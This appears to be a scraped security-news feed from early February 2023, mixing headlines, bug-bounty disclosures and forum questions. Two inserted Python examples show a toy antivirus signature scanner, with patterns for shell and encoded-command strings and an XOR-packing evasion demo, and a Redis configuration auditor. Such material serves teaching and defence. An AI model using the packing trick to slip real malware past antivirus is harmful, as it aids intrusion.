    Article URL: http://tom7.org/chess/cve.pdf Comments URL: https://news.ycombinator.com/item?id=34663799 Points: 1 # Comments: 0

    SecWiki News 2023-02-05 Review
    No news updated today. For more recent articles, visit SecWiki.

    Validating Tools
    Many times, in the course of our work as analysts (SOC, DFIR, etc.), we run tools...and that's it. But do we often stop to think about why we're running that tool, as opposed to some other tool? Is it because that's the tool everyone we know uses, and we just never thought to ask about another? Not so much the how, but do we really think about the why? The big question, however, is...do we validate our tools? Do we verify that the tools are doing what they are supposed to, what they should be doing, or do we simply accept the output of the tool without question or critical thought? Do we validate our tools against our investigative goals? Back when Chris Pogue and I were working PCI cases as part of the IBM ISS X-Force ERS team, we ran across an instance where we really had to dig in an…

    Red team offense and defense: a summary of AV evasion
    1. How antivirus works. 360, Tencent PC Manager, Huorong, Kingsoft Antivirus, Rising and so on are the leading antivirus products, and no antivirus software today can do without three components: the scanner, the signature database, and the virtual machine (emulator/sandbox). Whether an antivirus product is good to use mainly comes down to the scanner's speed and accuracy and the size of the signature database. 1.1 Signature-based static scanning. This technique is the obvious one, so the first generation of antivirus software was built on it; the idea was that as soon as a signature string is matched, the file can be judged to be a virus. But this method, in today's…
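    As an added example (not code from the post above), the following Python builds a toy signature-based static scanner of the first-generation kind the summary describes, packs a constructed sample with single-byte XOR so the signature bytes no longer exist on disk, and then shows what the unpacking/emulation stage (the "virtual machine" component in the post's terms) adds back. The signature database, the packer and the sample bytes are all constructed for illustration; nothing here is real AV data or real malware.

```python
# Added example, not code from the post above: a toy signature-based static
# scanner and a single-byte XOR "packer", showing why signature-only scanning
# is easy to evade and what an unpacking/emulation stage adds back.
# Signatures and sample bytes are constructed for illustration only.
from __future__ import annotations

# Constructed signature database: name -> byte string, matched case-insensitively.
SIGNATURES: dict[str, bytes] = {
    "shell-spawn":    b"/bin/sh\x00",
    "wscript-shell":  b"wscript.shell",
    "ps-encoded-cmd": b"-encodedcommand",
}


def scan_bytes(data: bytes) -> list[str]:
    """Static scan: names of all signatures whose bytes occur in the file as-is."""
    haystack = data.lower()          # bytes.lower() folds ASCII letters only
    return [name for name, sig in SIGNATURES.items() if sig in haystack]


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR 'packing'. XOR is its own inverse, so the same call
    with the same key also unpacks."""
    return bytes(b ^ key for b in data)


def scan_with_unpacking(data: bytes) -> tuple[int | None, list[str]]:
    """What an unpacking/emulation stage adds: try every single-byte key
    (key 0 is the unmodified file) and rescan. Returns the first key that
    yields a hit and the matching signature names, or (None, [])."""
    for key in range(256):
        hits = scan_bytes(xor_encode(data, key))
        if hits:
            return key, hits
    return None, []


# Constructed "malware" sample and its packed form (no real malware here).
SAMPLE_PLAIN = b"MZ\x90\x00junk" + b"/bin/sh\x00" + b"WScript.Shell" + b"junk"
SAMPLE_PACKED = xor_encode(SAMPLE_PLAIN, 0x5A)

if __name__ == "__main__":
    print("static, plain  :", scan_bytes(SAMPLE_PLAIN))            # both signatures hit
    print("static, packed :", scan_bytes(SAMPLE_PACKED))           # [] since the bytes on disk differ
    print("with unpacking :", scan_with_unpacking(SAMPLE_PACKED))  # key 0x5A, both hit
```

    The static scan finds both signatures in the plain sample and nothing in the packed one, which is the whole evasion. Brute-forcing the key is a stand-in for what a real engine does by emulating the unpacker stub; it also shows why a large signature database alone does not help against even trivial encoding.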

    Open Redirection
    JetBlue disclosed a bug submitted by doosec101: https://hackerone.com/reports/1267176
    Access to tomcat-manager with default creds
    JetBlue disclosed a bug submitted by doosec101: https://hackerone.com/reports/1267174

    🚨 Docker Full Privilege Escalation (CVE-2022-25365): "Breaking Docker Named Pipes SYSTEMatically" 🚨
    submitted by /u/kubiscan
    🔥 PipeViewer: A new tool for viewing Windows Named Pipes and searching for insecure permissions. 🔥
    submitted by /u/kubiscan

    The Linux CFS scheduler: principles, design and kernel implementation (2023)
    Notes on CFS, Linux's default scheduler. Kernel mechanisms such as CFS and cgroups together implement per-process CPU resource limits (CPU bandwidth control), one of the foundations of containers. 1 Concepts and relationships 1.1 CFS: fair scheduling of processes (tasks) 1.2 CFS extensions 1.2.1 Prerequisite: CONFIG_CGROUPS 1.2.2 Prerequisite: CONFIG_CGROUP_SCHED 1.2.3 Extension: real-time process group support (CONFIG_RT_GROUP_SCHED) 1.2.4 Extension: normal process group support (CONFIG_FAIR_GROUP_SCHED) 1.3 Further extension of CFS for normal process groups: CPU bandwidth control (quotas) 1.3.1 Problems with CFS 1.3.2 CONFIG_CFS_BANDWIDTH 1.4 Recent improvements to CFS bandwidth control 1.5 Summary: relationships among the CFS-related kernel build options 2 CFS design 2.1 Design goals and basic principles 2.2 Core concepts 2.2.1 vruntime 2.2.2 runqueue 2.2.3 The time-ordered red-black tree 2.3 Scheduling policies 2.3.1 Real-time policies SCHED_FIFO SCHED_RR 2.3.2 Normal policies SCHED_NORMAL SCHED_BATCH SCHED_IDLE 2.3.3 Differences between the SCHED_NORMAL (normal) and SCHED_RR (real-time) policies 2.3.4 Viewing or modifying a process's scheduling attributes 2.4 Scheduling classes 2.5 Group scheduler extensions 2.6 CFS configuration options, with examples 2.7 CP…


    Went on a merchant’s site on safari. I have been on this site many times and never logged into any account on it. Today I went on the website on safari and it was showing another person’s account. I have no idea who they are. No one has access to my phone or connection but me. How is this possible?
    I called the merchant, who is a reputable mainstream merchant, and sent a ticket to their IT. I'm waiting for a response, but in the meantime, I'm wondering how this is possible. I have never signed into any account for this site on Safari. I have signed into my own account for this merchant in Firefox. I do not know who the person is whose account showed up in Safari. I wasn't logged in, but when I went to the merchant's homepage it said "Hi Ashley Moore" and then I saw there was a 5 in the cart icon; I clicked on it and it showed 5 items I have never heard of. It then asked me to log in and showed an email for this Ashley person. What could cause this? Could my Safari have been hacked? No one but me has access to my phone. Using iOS 16.1.1, cellular data only, and no VPN. submitted by /u/woniwonu
    Risk of malware spreading over network when using a Linux VM to browse the internet.
    Hey, I just set up LinuxLite as a VM in VirtualBox on my Windows PC; under network I picked NAT. I'm planning to use the VM to browse the internet using Chrome, without downloading or uploading anything. As far as I understand, Linux users are considerably safer against most types of malware because the malware can't gain root access and is therefore unable to compromise the whole system, just local files or specific programs. But what about malware that spreads over the network, like worms for example? 1) Could such malware compromise the browser and then spread over my network to non-Linux machines? 2) Considering I keep the system and software updated, how likely is that to happen? 3) If the answer to my first question is yes, how can I protect myself against such threats? submitted by /u/younggoodlooking
    How come a recently released router such as TL-MR100 have deprecated security protocols like TKIP?
    I have been configuring a cellular router to be able to work better on the move. When connecting to it from another iPhone I got the "weak security" tip which stated that WPA/TKIP is deprecated. But how so? I thought TP-Link has good products and it's a modern router. I checked and I can't configure it to use WPA3. Why not? Can't it just be done via a firmware update? submitted by /u/BigBootyBear
    What would be your next goal after a title like DevSecOps Senior Advisor ?
    I know that role titles can be smoke and mirrors, but I just got offered the DevSecOps Senior Advisor role with 3 years of experience and a TC of 133k CAD. The role is a mix of Cloud Sec (AWS and Azure), Data Loss Prevention and automation, in the Canadian financial sector. Since I'm still at the beginning of my career, I tend to think long-term and I'm willing to eventually try new things related to the tech sector, around cybersecurity. What would be the next logical step after this role in a few years: Architecture? Software Engineering (I don't really code, except I learned C# a few years ago)? Consulting? Management? submitted by /u/down_to_earth2
    found a security site from Sec.gov
    Anyone know how to decipher this site? It mentions JPMorgan Chase. https://www.sec.gov/Archives/edgar/data/19617/000119312516528232/0001193125-16-528232.txt submitted by /u/Randomthings55
    Splitting DNS DHCP for guest network
    I have a setup where guest WiFi users get IP addresses and DNS servers from the same resources that service staff computers. These are off AD servers. While the ACLs limit access, we have no control over the endpoints and have seen heavily malware-loaded laptops join. So I want these servers to not be AD, to be on an island themselves, and to be hardened. If they're breached, the impact is on guest WiFi. Thinking through other parts of this: I need a way in from the staff side, so a bastion? Or VPN? Anything else I should consider? I do need internal DNS as some resources are internal, but those are web sites in a DMZ. Appreciate any advice, ideas, thoughts! submitted by /u/Shujolnyc
    Should you regenerate pass phrases to find one that's comfortable?
    I saw this advice sometime earlier, and while it improves memorability, doesn't this make you susceptible to attacks because you are more likely to choose a much smaller subset of diceware's dictionary? It has 7776 words, and I personally, as a non-native English speaker, would likely choose only 500 of them willingly. If someone was able to figure them out (the 500 words) through some kind of analysis, am I not screwed in this case? submitted by /u/SteveSonOfJobs
    Zero Trust
    How do you go about defining what a user can access? So right now, say you have the substandard VPN where the user can reach the front door of 99% of applications within the enterprise. How do you go about creating the user profile to know what they need to access and eliminate the rest? Thanks submitted by /u/brasschaser
    Is there a separate discipline geared towards securing the backend architecture of web apps?
    I work in application security and have been joining in on some discussions to assess our products' security in depth. Some of these conversations involve topics that I have not really had to contend with so far. For example, storage location of the database connection string, management of the DB encryption key, code deployment method, etc., things that have more to do with, I guess, the back end architecture? As an appsec engineer, I've mostly been dealing directly with web app security (OWASP Top Ten, SAST and DAST scanning, API testing, etc.), and the learning materials I've used for appsec and for my certs never really seemed to discuss backend architecture related to the examples above. Is there a specific discipline for this within cybersec? I'm mostly interested in finding resources to study that aspect of security and build my skills. TIA! Edit: maybe 'backend architecture' is not the right terminology. Unfortunately I don't have a background in CS or development, so I'm always getting tripped up with terminology. submitted by /u/desmond_4815162342
    Clicking .ps1 Insecure?
    Can someone explain to me why running a .ps1 script by double-clicking on it is considered insecure? I set the execution policy to RemoteSigned, so nothing can execute from an external origin that is not signed. I'm open to using a more secure method, but I am unaware of what that solution is. Link to my original post below in regards to editing a small script I wrote. https://www.reddit.com/r/PowerShell/comments/10ssoxa/stop_powershell_script_from_closing_powershell/?utm_source=share&utm_medium=android_app&utm_name=androidcss&utm_term=1&utm_content=share_button submitted by /u/defaultaro

    How to search for someone on OnlyFans, like an expert?
    Did you know, onlyFans has over 170 million users subscribed? That’s 50% more people than the whole population of the USA! or, over 2.5… Continue reading on Medium »
    OSINT (Open source intelligence tools used in 2023)
    I've curated a list of open source intelligence tools which are used by intelligence enthusiasts, coders and hackers, and also added… Continue reading on Medium »
    SOC143 — Password Stealer Detected
    Let’s start to investigate this stealer security incident. Firstly, we can see the sender, recipient address, incident happening time and… Continue reading on Medium »
    Update v2 (Malaysian OSINT resource list)
    This is the second update for the Malaysian OSINT resource list. Basically, I just follow the OSINT Skills Chart for the base Continue reading on Medium »

    DoS and arbitrary file read in (ImageMagick: The hidden vulnerability behind your online images)
    submitted by /u/Mini_True

    Top 21 Tools for Penetration Testing
    Penetration testing, also known as pen testing, is an important aspect of cybersecurity that helps organizations identify and address… Continue reading on Medium »
    “How to succeed in bug bounty” a framework.
    Hey there reader, are you hoping to make millions with bug bounty? That’s quite the ambition you’ve got there, and while I’m not going to… Continue reading on Medium »
    BE PART OF OUR APOLLO COMMUNITY!
    BugBase Apollo is a community of highly skilled security experts and hackers passionate about making the digital world safer. These elite… Continue reading on Medium »
    Web 3.0 : The Future of Web and CyberSecurity
    Hello my infosec and tech mates, I hope you all are doing great at your lives even am doing great right now, (can’t say not really). So… Continue reading on Medium »
    CSRF Where Token is duplicated in Cookie | 2023
    Portswigger Cross-Site Request Forgery Lab Simple Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Social media takeover. How I managed to "take over" a hacker's profile on Twitter.
    My name is Diego, and let's get to what matters. Continue reading on Medium »

    SecWiki News 2023-02-04 Review
    A review of open-source software supply chain attacks by ourren; Key principles of NSA security operations by ourren; Hacking a Starlink terminal router for $25 by ourren; Hiding C2 servers and bringing Linux hosts online by 路人甲; Sharing a JAR analysis tool: jar-analyzer by ourren. For more recent articles, visit SecWiki.

    Top 10 vulnerability assessment tools, 2023 edition (including container-focused ones)
    This article recommends only OSV-Scanner, OpenSCAP and ZAP, open-source tools that support or include some container security scanning capability.
    Introduction to ATT&CK v10 tactics: Persistence (part 1)
    This installment covers the theory behind the first six sub-techniques of the Persistence tactic; the next installment will cover the remaining sub-techniques.

    CVE-2021-21974 is open for ESXi 6
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974 Comments URL: https://news.ycombinator.com/item?id=34651642 Points: 3 # Comments: 1


    Introduction to Cybersecurity - Chapter 0
    Part 1 Continue reading on Medium »

    Gartner Peer Insights widget - postMessage DOM XSS vulnerability
    submitted by /u/Gallus
    How to Develop Intuition for Security Research: Apply the Scientific Method
    submitted by /u/crypt_keepr
    PixPirate: a new Brazilian Banking Trojan | Cleafy LABS
    submitted by /u/f3d_0x0
    Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit - CVE-2023-21608
    submitted by /u/hacksysteam
    Pre-Auth RCE in Aspera Faspex: Case Guide for Auditing Ruby on Rails
    submitted by /u/Mempodipper
    TC39 proposal for mitigating prototype pollution
    submitted by /u/Gallus

    Password-stealing “vulnerability” reported in KeePass – bug or feature?
    Article URL: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/ Comments URL: https://news.ycombinator.com/item?id=34648654 Points: 1 # Comments: 1

    Another EnCase report question, timezone setting
    I changed the timezone on the device to what it was, but my report is still showing my timezone when items/images are listed for created/written/accessed. Is that normal behavior? Like, in the evidence it shows the proper timezone/time, but once an item is bookmarked and in the report, it shows my timezone in the report. Is there a way to change this? Sorry for asking here again; I really don't know where to turn to. I've taken training and I have the books, but little things like this and the hex thing weren't explicitly mentioned. submitted by /u/dardack
    Experiencing very slow verification speed using FTK Imager
    Users are experiencing significantly slow FTK Imager verification times when verifying their images from our file servers (WS2019 Standard VMs) for their processed images. Processing to our file servers may go at 60 MB/s, yet verifying those same images may go at 7 MB/s. This is happening for all users regardless of what data they are trying to verify. We host the virtual file servers on Dell R730s running Hyper-V. I have tried setting exclusions in Windows Defender for the network locations; it does speed up some image verification as it no longer scans the files, but it always seems to sink back down to 7-15 MB/s for most images. When the data is verified locally and not on the network, verification speeds seem to match the processing speeds of 60 MB/s. The file servers themselves have 10Gb vNICs and handle data copying easily, and they don't slow down when transferring data to our users; data is still transferred at around 80-90 MB/s to the users' 1Gb computers. Any insight is appreciated; these slow verification times are hindering workflow! Our environment: - Clients have Dell T7920s, T5820s, T7910s - Servers are Dell R730s with SAS connections to storage enclosures running HDDs and using Microsoft Storage Spaces Direct. - Connections are 10Gb to switches and 1Gb to user computers. submitted by /u/defaultuser100

    Update to the REF2924 intrusion set and related campaigns
    submitted by /u/dmchell

    Top sites for passive reconnaissance
    Passive reconnaissance is the process of collecting information in a covert manner about an intended target without the target knowing… Continue reading on Medium »
    Get Into Cybersecurity in 2023: A Step-by-Step Guide
    Unlocking the Secrets to a Successful Cybersecurity Career: A Step-by-Step Guide for Beginners Continue reading on InfoSec Write-ups »
    Bug Zero at a Glance [Week 28 January — 03 February]
    What happened with Bug Zero? Continue reading on Bug Zero »
    Research | How can Local File Inclusion lead to RCE?
    Local File Inclusion (LFI) is a type of vulnerability commonly found in web applications. It allows an attacker to include a local file… Continue reading on Medium »
    WebPenetration Tester Roadmap
    Sec 542 & 642 notes in here: https://lnkd.in/dkeGVvy Continue reading on Medium »
    Play with Google, Twitter, Apple, Dell
    The story of how I found vulnerabilities in Google, Twitter, Apple and Dell for fun after more than 40 tries. Continue reading on Medium »
    Password Reset Poisoning with Host Header Injection
    Hey folks, I am Bharat Singh a Security researcher and Bug Hunter. I am here with an amazing writeup about Password Reset Poisoning with… Continue reading on InfoSec Write-ups »
    Broad scope hacking flowchart
    Continue reading on Medium »
    Jenkins hacking community checklist
    Enum and information: Continue reading on Medium »
    What do HTTP response status codes say?
    A look at the most commonly seen status codes along with what they mean. Continue reading on Medium »

    IMINT — Imagery Intelligence
    IMINT, or Imagery Intelligence, is a discipline within intelligence that consists of the analysis and/or exploitation of images… Continue reading on Medium »

    Tips on enumerating unknown APIs in my environment?
    There's been a merger, and I'm trying to address a blind spot with all the new systems and widgets. I'd like to find any/all API services available and confirm they are secured. While I could just dump DNS entries and loop through them with /api/ at the end of a curl... I don't feel like that's particularly exhaustive. I have Nessus running, but I haven't found where they have a plugin that really handles this. I did some poking around the open-source world and the search terms are generic enough that I'm not getting great results. submitted by /u/lonejeeper
    Why do people hide certificate IDs?
    I see people hiding certificate IDs when posting on social media platforms. Is there any solid reason or restriction, or are people just following the trend blindly? submitted by /u/dauhui

    CVE-2022-43551: Another HSTS bypass via IDN
    Internet Bug Bounty disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1813831 - Bounty: $2400
    Mystery with a leaked token and Reusability of email confirmation link leading to Account Takeover
    Sorare disclosed a bug submitted by gokulsk: https://hackerone.com/reports/1817214 - Bounty: $300
    TikTok 2FA Bypass
    TikTok disclosed a bug submitted by amans: https://hackerone.com/reports/1247108 - Bounty: $1564

    Alibaba Cloud Drive went down
    According to multiple media reports, Alibaba Cloud Drive suffered an outage and became inaccessible at around 22:30 on February 3.
    "Key Tasks for Electric Power Safety Supervision in 2023" released; cybersecurity is emphasized again
    The document calls for advancing network and information security work in the electric power industry.
    FreeBuf Morning Report | European car dealership giant hit by ransomware; Twitter API will no longer offer free access
    Twitter announced that starting February 9 its API (both v2 and v1.1) will no longer support free access; using the API will require payment.
    Designing a security defense architecture that fits the "four high" characteristics of industrial control systems
    Continuously detect cybersecurity threats, accurately perceive cybersecurity risks, promptly block attack activity, and keep improving network protection measures.
    The Woes of Redis Vulnerabilities
    Preface: this is another summary of what I learned earlier about Redis-related vulnerabilities. Cause of the Redis unauthorized access vulnerability: redis is bound to 0.0.0.0:6379, and no firewall rules have been added to block access from untrusted source IPs, among other things.
    FreeBuf Weekly | Xiaomi Auto supplier fined 1 million yuan for leaking secrets; 2022 China Cybersecurity Industry Panorama (5th edition) released
    Happy weekend, Buffers. It's weekly report time again: we've summarized and recommended this week's hot news, security incidents, good reads and handy tools so you don't miss any of the week's highlights!
    XSS Game walkthrough
    My writing is rusty and my wording shallow; I hope the experts will be generous with their advice. Many thanks.
    The 8 biggest cybersecurity threats facing the automotive industry in 2023
    When it comes to automotive cybersecurity threats, attackers have countless ways to steal vehicle and driver information and to disrupt vehicle functions.
    CISSP, worth having (my study path)
    Sharing my CISSP study experience
    reGeorg + proxychains for lateral movement in the internal network
    reGeorg is a SOCKS5-based tool that supports many script types, such as aspx, ashx, jsp, jspx, php and so on.
    Critical vulnerability in QNAP software affects nearly 30,000 devices
    A critical vulnerability exists in QTS 5.0.1 and QuTS hero h5.0.1.
    Home improvement giant Andersen exposed customers' home photos and addresses
    Construction and home improvement giant Andersen Corporation exposed customers' private data, including home photos and addresses.
    Multiple Redis servers hit! Beware of the new HeadCrab malware
    Since September 2021, at least 1,200 Redis database servers worldwide have been compromised by malware named HeadCrab.
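    The two Redis items above (the root cause given in "The Woes of Redis Vulnerabilities", and the HeadCrab campaign against exposed Redis servers) share one precondition: an instance reachable from untrusted networks with no authentication in front of it. As an added example, not code from either article, the Python below parses a redis.conf and flags that condition. Both configs are constructed here for illustration; the directive names (bind, protected-mode, requirepass, rename-command) are Redis's own. A config check does not replace the firewall rule the first article mentions: port 6379 should still be filtered to trusted sources at the network level.

```python
# Added example, not from either article: audit a redis.conf for the
# exposure conditions behind the "unauthorized access" bug class.
# Both configs below are constructed for illustration.
from __future__ import annotations

WEAK_CONF = """\
# constructed: an instance exposed the way the article describes
bind 0.0.0.0
protected-mode no
port 6379
# no requirepass, no ACLs, no rename-command
"""

HARDENED_CONF = """\
# constructed: the same instance with the obvious fixes applied
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass ChangeMe-to-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

# Arguments to 'bind' that mean "every interface".
ALL_INTERFACES = {"0.0.0.0", "*", "::", "-::*"}


def parse_redis_conf(text: str) -> dict[str, list[list[str]]]:
    """Map each directive to every argument list seen for it (directives such
    as rename-command may repeat). Comments and blank lines are skipped."""
    directives: dict[str, list[list[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        directives.setdefault(name.lower(), []).append(args)
    return directives


def audit_redis_conf(text: str) -> list[str]:
    """Return one finding per failed check; an empty list means all checks passed."""
    d = parse_redis_conf(text)
    findings: list[str] = []

    # 1. Listening on all interfaces: an explicit wildcard, or no 'bind' at all.
    bind_args = d.get("bind", [[]])[-1]          # the last 'bind' line wins
    if not bind_args or ALL_INTERFACES & set(bind_args):
        findings.append("bind: listening on all interfaces; bind to loopback or an internal address")

    # 2. protected-mode no removes the guard that refuses unauthenticated
    #    remote clients when no password is configured.
    if d.get("protected-mode", [["yes"]])[-1] == ["no"]:
        findings.append("protected-mode no: unauthenticated remote clients are accepted")

    # 3. No authentication at all (legacy requirepass or ACL users).
    if not any(k in d for k in ("requirepass", "user", "aclfile")):
        findings.append("auth: no requirepass or ACL configured")

    # 4. CONFIG is what the classic unauthenticated-access chain uses
    #    (CONFIG SET dir / dbfilename to write a file); FLUSHALL is the usual
    #    wiper. Renaming them to "" disables them outright.
    renamed = {args[0].upper() for args in d.get("rename-command", []) if args}
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} reachable by its default name")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit_redis_conf(conf) or ['no findings']}")
```

    Run against a real file with `audit_redis_conf(open("/etc/redis/redis.conf").read())`. On Redis 6 and later, ACL users are the preferred replacement for requirepass and for command renaming, which is why check 3 also accepts `user` and `aclfile` directives.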

    SecWiki News 2023-02-03 Review
    No news updated today. For more recent articles, visit SecWiki.

    Will Fuzzing Replace SAST?
    In many instances, the answer is becoming “when” not “if.” Continue reading on System Weakness »
    Google’s OSS-Fuzz will add JavaScript — Fuzzing Weekly CW5
    OSS-Fuzz announced to add JavaScript support in 2023: https://security.googleblog.com/2023/02/taking-next-step-oss-fuzz-in-2023.html Continue reading on Medium »

    The First Steps on the Zero Trust Journey
    One of the most discussed concepts in the Information Security world in recent history has been Zero Trust. Although many vendors claim to have products for implementing Zero Trust, an organization must not view them as an instant solution to achieving Zero Trust. Zero Trust should be viewed as a philosophy comprised of many controls... The post The First Steps on the Zero Trust Journey appeared first on TrustedSec.

    Google’s OSS-Fuzz Adds JavaScript Support in 2023 – Fuzzing Weekly CW5
    Article URL: https://ioc.exchange/@FuzzingWeekly/109800061913485158 Comments URL: https://news.ycombinator.com/item?id=34639120 Points: 1 # Comments: 0

    Lots of books, no organization structure,
    submitted by /u/NullVoidPointer


    CORS Vulnerability with Basic Origin Reflection | 2023
    Portswigger’s Cross-Origin Resource Sharing Lab Simple Solution | Karthikeyan Nagaraj Continue reading on Medium »
    SQL injection with filter bypass via XML encoding | 2023
    Portswigger’s SQL Injection Lab Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Why are Bug Bounty programs so popular?
    The rise of cyberattacks has been a significant concern for every organization. In the Data-driven business, organizations in various… Continue reading on Medium »
    IDOR - Inside the Session Storage
    Summary Continue reading on Medium »
    My first Hall Of Fame with a chained Broken Access Control
    This blog is about how I got my first HOF after chaining multiple bugs. Continue reading on InfoSec Write-ups »
    Everything You Need to Know about Cyber Security: A Comprehensive Introduction
    Cybersecurity is the safeguarding against cyber threats of internet-connected systems, including data, software, and hardware. To prevent… Continue reading on Bug Zero »
    What will Developers’ Lives Be Like in 2023 Thanks to AI-Driven Development?
    We software developers are always searching for methods to improve our processes and function more productively. Continue reading on Bug Zero »
    Discovering 5 XSS Vulnerabilities In a Simple Way With Xssor.go
    This write-up is specially made for showing the power of my new tool, It’s called Xssor.go This tool is a XSS payload reflection tester… Continue reading on Medium »

    KeePass Devs Downplay Password Theft Vulnerability
    Article URL: https://hothardware.com/news/keepass-devs-downplay-password-theft-vulnerability Comments URL: https://news.ycombinator.com/item?id=34635107 Points: 1 # Comments: 1

    Index with a lot of ebooks of all different subjects
    https://213.230.96.51:8090/files/ebooks/ submitted by /u/revwolf
    Index with a lot of media
    https://itonaku.xyz/ submitted by /u/Isolatedleliel
    Technical, Graphics, and Polymers.
    Lots and lots and lots of Cyber, Accounting, etc... https://www.kgay4all.com/seioqueseiporleroqueleio/Books/ Graphics program manuals and guides of all kinds. https://lira.epac.to/DOCS-TECH/Graphics/Photoshop/ Polymers. It's all polymers. https://www.eng.uc.edu/~beaucag/Classes/Properties/Books/ submitted by /u/Shitemoji69

    Wazuh at scale?
    Anyone deploy Wazuh where you needed separate indexer, server, and dashboard servers? I've asked in that sub and got no response. Don't need scale specifics, just a high-level "here are the pieces". It looks to me like I'd need (as an example): 3 indexers, 1 server, 1 dashboard, and a load balancer for the indexers. submitted by /u/Shujolnyc
    Trellix (exMcAfee) antivirus performance issue
    Users who use Trellix (ex-McAfee) Endpoint Security (ENS), do you have any success story with fixing its high CPU consumption? I read the entire McAfee forum, all the guides and troubleshooting, server profiling, whitelists, and even just turned off the antivirus on the server, but the CPU is still high, +20-50% from McAfee, in turned-off mode :( I've reinstalled it 10 times already. How did you solve the problems? Also, a question for users of other antiviruses: how do you deal with high CPU? Do you often have these problems? submitted by /u/athanielx
    Tools for "static" log analysis
    I am looking for tools to do "static" log analysis. (Not sure if this is the correct term for it.) So I am talking about an air-gapped system where it is not possible to collect the data (log files) over the network. Every couple of months the log files will be collected via USB sticks and combined in one place. Right now the data is fed into ELK and then parsed and analyzed, but I was wondering if there are maybe tools which are made to do this kind of analysis, because from my understanding ELK is not meant to be used like this. Do you have any recommendations? submitted by /u/Ludtwigk
    What do I need to learn to get into Cyber Security
    Long story short, I was a court reporter and my hands gave out. I'm a little discouraged because I'm in my 30s and am wanting to start a new chapter in my life, and I know NOTHING about computers. I'm not even sure how to work Reddit. This is my 2nd post. I'm not even sure I'm in the right spot lol... Anyway, I looked into CS50 (the first lesson) and I loved it. I've always loved math; I've always loved the detail. I don't know, I want to give it a shot. A real shot. What do I need to know to grow in knowledge and really set myself up for success here? School isn't an option anymore. I'm 60k in the hole and paying that baby off. Any Computer Science people out there? Or Cyber Security folks that would give an advice or two? submitted by /u/No_Conversation5705
  • Open

    What this KeePass CVE means for organizations searching for new password vaults
    After the 2022 LastPass breach, many organizations began searching for alternative password vault solutions. KeePass, a legacy open-source option, has risen to the top for many organizations evaluating their options. Others have been using this option already for years. A recent POC demonstrating how to abuse the Trigger feature was released and assigned a CVE.... The post What this KeePass CVE means for organizations searching for new password vaults appeared first on TrustedSec.
  • Open

    XSS at jamfpro.shopifycloud.com
    Shopify disclosed a bug submitted by kannthu: https://hackerone.com/reports/1444682 - Bounty: $9400
  • Open

    Discovering Six Critical Docker Desktop Privilege Escalation Vulnerabilities. (Bonus: New OSS Tool!)
    submitted by /u/jat0369 [link] [comments]
    GitHub - adityatelange/bhhb: Tool to view HTTP history exported from Burp Suite Community Edition
    submitted by /u/adityatelange [link] [comments]
    The missing piece: the need for product management in security teams
    submitted by /u/sullivanmatt [link] [comments]
    EMBA - Automated firmware security scanner v1.2.1 released
    submitted by /u/_m-1-k-3_ [link] [comments]
    An easy way to preview the content of an XML nmap file, in VS Code.
    submitted by /u/j_bono [link] [comments]
    Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit - CVE-2023-21608
    submitted by /u/hacksysteam [link] [comments]
    Demystifying SMPC (Secure multi-party computation) and its threat model
    submitted by /u/hardenedvault [link] [comments]
    Unserializable, but unreachable: Remote Code Execution on vBulletin
    submitted by /u/cfambionics [link] [comments]
  • Open

    Chocolate Factory TryHackMe Writeup | By Xploit Ayush
    No content preview
    Cyborg TryHackMe Writeup | By Xploit Ayush
    No content preview
    Threat Detection
    No content preview
    High Level Analysis of Custom Browsers
    No content preview
    PhotoBomb Hack the box Walkthrough — [HTB]
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 2
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 1
    No content preview
    My first Hall Of Fame with a chained Broken Access Control
    No content preview
  • Open

    SecWiki News 2023-02-02 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    Gmail Analiser
    Hello all, I am wondering if there is any software to analyze Gmail accounts, like logins, accesses, points of login, in freeware/open source? Thank you submitted by /u/hpbalmeida [link] [comments]
    Recon Lab by Sumuri
    Anyone ever used it before? If so, how was it? Also, it only works on Mac; is that a con or a pro for consumers and forensic experts? submitted by /u/Jack_gg123 [link] [comments]
    Forensic Workstation Pre-Builts
    Hi All, Curious about what everyone has been using or would consider using for a portable forensic workstation. I am well aware the meta is gaming laptops. Our practice is a small team and we're undergoing an equipment refresh. We have Alienwares and Dells currently, but I would like to get an idea of what everyone else seems to be using; my team leader is open to suggestions. We're a Cellebrite and Axiom shop; my understanding in basic terms is that Cellebrite is bound by RAM and Axiom bound by CPU for parsing images. Any noticeable difference with modern (meaning 1-2-year-old) Intel vs AMD CPUs? Also open to suggestions for smaller laptops that may hit a sweet spot in terms of performance comparable to a gaming machine; our practice sometimes delivers devices to clients for remote collections. submitted by /u/greengobblin911 [link] [comments]
    OpenSource X-Ways X-Tension: VirusTotal Plugin
    submitted by /u/Alarming_Arm_7724 [link] [comments]
  • Open

    Enumerating AD in an OPSEC safe way
    In this week's red team tip, I show a way to enumerate AD in an OPSEC-safe way with Layer8Security's SilentHound. This tool uses a single LDAP query to list AD and caches the results locally. It's not nearly as loud or as well fingerprinted as SharpHound/AzureHound. Plus, you can convert the local cache to JSON and use jq or other tools to query the cached data. https://youtu.be/MRLZO17ZrmA submitted by /u/Infosecsamurai [link] [comments]
  • Open

    I’m Red Team — My Methodology & Tools
    It may seem counterintuitive to pay someone to tell you your shortcomings, but smart companies today are shelling out dollars and… Continue reading on Medium »
  • Open

    How to handle incident response audits; WebShell detection and control ideas | FB Party-A Group Topic Discussion
    When facing an audit by regulators, how to demonstrate that the security incident response management system has been put into practice; a discussion of WebShell detection ideas and control measures. Click for more~
